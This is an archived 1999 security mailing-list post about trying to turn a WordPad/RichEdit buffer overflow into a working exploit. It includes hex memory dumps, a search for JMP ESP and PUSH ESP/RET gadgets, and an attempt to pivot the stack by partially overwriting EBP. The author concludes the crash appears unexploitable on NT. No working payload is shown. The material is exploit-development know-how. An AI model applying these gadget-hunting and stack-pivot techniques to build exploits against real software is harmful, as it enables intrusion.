Re: development of wordpad exploit

[dullien () GMX DE (Thomas Dullien)]

On Sun, 21 Nov 1999 12:41:24 CET, Pauli Ojanpera wrote:

> Notifications about things...
>
> In NT WordPad crashes with lowercased alphas as opposed to upcase
> in 98. That's why some people get 41414141 and some get 61616161.

Hrmm.. this is interesting. If we can get uppercase letters, we might be
able to get other things as well that could make this thing exploitable.

I assume that under 9x, riched20.dll is used instead of riched32.dll in NT.
Can someone verify this ? Or perhabs do similar analysis of wordpads
behaviour on 9x like the one I did ?

Under NT it looks grim though, I still don't think it is exploitable. Beware
though that I am not into security for a long time, and I could have forgotten
some clever trick that some of the older guys here know ;>  Here are 
my results from trying to set EIP to any of our code:

Well, our main problem is setting the EIP correctly. If we can manage to 
somehow execute our code, it is possible that we could perhabs manage
to jmp to the mapped file. Problem:
We can set EIP to the following:
75023a00 
        EC 83 EC 04
        in al, dx --> not useful
75020061-75023007A
        00 00 00 C0 E0 04 FF 4D-F0 0A C1 8B 4D EC FF 45 
        EC 88 01 8B 16 80 3A 00-75 BC 8B 06 33 C9 38 08  
        Nothing that can be used to go to execute code on the
        stack either...

now the fun part :)
I don't know if in any of these bytes is the possibility of changing EIP
to esp. I haven't found anything obvious such as PUSH ESP, RET
(0x54, 0xC3) or JMP ESP or so... well, if you do find a way, please 
tell me ;>

0023:75006161 45 FE 0F BF 55 FA 03 C3-03 C2 3B 45 E4 7E 26 33  
0023:75006171 C0 39 45 F0 75 7B 3B 5D-E4 7E 10 66 2B FB 8B 

0023:75006261 FF FF FF 8B 86 34 05 00-00 99 F7 FF 03 C8 85 C9 
0023:75006271 7F 2D 33 C9 EB 29 8B 86-34 05 00 00 8D 57 01 

0023:75006361 8E A8 05 00 00 50 E8 AB-D4 FF FF EB 04 80 4E 7C
0023:75006371 01 33 C0 5F 5E 5B 8B E5-5D C3 83 EC 08 56 39 

0023:75006461 FF 15 28 42 02 75 57 6A-18 55 FF 15 28 42 02 75 
0023:75006471 56 8B 3D E0 42 02 75 53-55 FF D7 8D 44 24 10 

0023:75006561 5F 5E 5B C2 04 00 55 8B-EC 83 EC 10 56 57 52 8B
0023:75006571 F2 8B F9 FF 15 44 40 02-75 8B 87 30 05 00 00 

0023:75006661 E5 5D C2 0C 00 53 56 83-79 04 00 66 8B DA 57 8B
0023:75006671 F1 74 69 33 FF 6A F4 FF-36 FF 15 D8 42 02 75 

0023:75006761 85 C0 B8 00 00 00 00 74-0F 57 6A 00 68 81 00 00
0023:75006771 00 56 FF 15 E8 42 02 75-5F 5E C3 53 56 57 8B 

0023:75006861 96 B4 04 00 00 6B FF 14-8B 4D F0 39 0C 17 75 07
0023:75006871 B8 FF FF FF FF EB 07 83-7D FC 00 7E 01 48 5F 

0023:75006961 00 00 85 D2 7C 0E FF 75-0C FF 75 08 57 8B CE E8
0023:75006971 88 31 01 00 5F 5E 5B 8B-E5 5D C2 08 00 56 8B 

0023:75006A61 F0 85 F6 7E 1B 8D 45 F4-8B CF 50 E8 1C CD FF FF
0023:75006A71 8D 55 F4 8B CF FF 75 0C-56 E8 E7 32 00 00 8B 

0023:75006B61 02 75 EB 2D F6 46 63 01-74 27 8B 45 E8 8D 4D E8
0023:75006B71 FF 75 FC FF 75 F8 51 C7-45 E8 00 00 00 00 89 

0023:75006C61 74 05 8A 4D DB 88 08 80-7D 08 01 74 0D 8A 45 08
0023:75006C71 38 45 D7 B8 00 00 00 00-75 03 8B 45 BC 5F 5E 

0023:75006D61 00 B9 0F 00 00 00 8B FA-F3 A5 8B 4C 24 14 C7 02
0023:75006D71 01 00 00 00 A1 04 80 02-75 85 C9 7C 50 8B 68 

0023:75006E61 00 2B 41 08 99 F7 FE 8B-F0 83 C3 3C 4F 83 FF 01
0023:75006E71 7F C5 68 28 80 02 75 FF-15 6C 41 02 75 83 7D 

0023:75006F61 FF FF 8D 55 F4 8B CF E8-49 F5 FF FF 80 38 0D 75
0023:75006F71 4F 4B 85 DB 7E 4A 6A FF-EB 2C 3C 0D 75 42 8D 

0023:75007061 FF 15 B0 42 02 75 5E C3-55 8B EC 83 EC 18 8B C2
0023:75007071 53 C1 E0 05 56 57 8B F1-6A 01 89 55 FC 8B 8C 

0023:75007161 8B CE E8 67 32 00 00 5F-5E 5B 8B E5 5D C3 53 56
0023:75007171 8B 41 08 57 3B D0 8B FA-8B F1 74 2E 8B 16 7D 

0023:75007261 83 C7 2C 89 45 F0 89 55-F4 8B 07 C1 E0 05 6B C9
0023:75007271 14 8B 9C 30 B4 04 00 00-03 D9 83 7D FC 00 7D 

0023:75007361 3B C3 7F 02 8B C3 3B F8-8B EF 7C 02 8B E8 3B FB
0023:75007371 75 28 8B 96 E0 00 00 00-83 EA 02 3B EA 7E 1B 

0023:75007461 B8 FF FF FF FF 89 81 98-05 00 00 89 81 9C 05 00
0023:75007471 00 C3 55 8B EC 83 EC 2C-53 56 57 8B D9 83 79 

0023:75007561 00 00 89 4D B4 85 D2 7E-12 83 BB 90 05 00 00 00
0023:75007571 74 09 C7 45 C8 01 00 00-00 EB 07 C7 45 C8 00 

0023:75007661 C7 0C 89 4D E0 89 7D C4-8B 11 8B 0F 03 CA 3B 4D
0023:75007671 98 7F 13 C7 45 E8 01 00-00 00 C7 45 E4 00 00 

0023:75007761 7E 13 2B 75 08 8B 4D 0C-03 CE 8B 45 BC 3B C8 7F
0023:75007771 02 8B C8 8B F1 8B 4D C0-C7 01 00 00 00 00 8B 

0023:75007861 F0 FF 15 E4 41 02 75 8B-45 B0 39 83 A4 04 00 00
0023:75007871 7E 10 8B 4D D0 8B 55 E0-8B 01 2B 02 03 45 B0 

0023:75007961 55 F0 FF 15 E4 41 02 75-85 FF 74 07 57 FF 15 08
0023:75007971 40 02 75 85 F6 74 07 56-FF 15 08 40 02 75 6A 

0023:75007A61 FF 56 8B 47 10 2B 47 0C-8D 54 24 0C 50 8B CF E8 
0023:75007A71 13 60 00 00 EB 21 83 E8-08 8B 97 30 01 00 00 

0023:75007B61 00 80 67 03 BF 8B C3 5F-5E 5B C3 55 8B EC 83 EC  
0023:75007B71 5C 53 56 8D 81 2C 05 00-00 57 8B F1 33 DB 8B 

The entire Range 00616161-007A7A7A with all its betweenthings are
non-paged, so no chance here. In the region 61616161-7A7A7A7A,
everything that can be reached by our combinations is non-paged as
well:-(

Damn, it would've been to cool to exploit this babe ;> 
Thats why I tried only overwriting part of EBP which is then moved into
ESP one function higher, which leads me to the
following possible ESP's I can set:

12EF00 --> works, but will leave me with an EIP in 00600000 range,
which is all nonpaged. 
120061-12007A --> nonpaged, will cause exception, so unusable.

Thomas Dullien
dullien () gmx de
Win32 Security Consultant ;-> Hire me !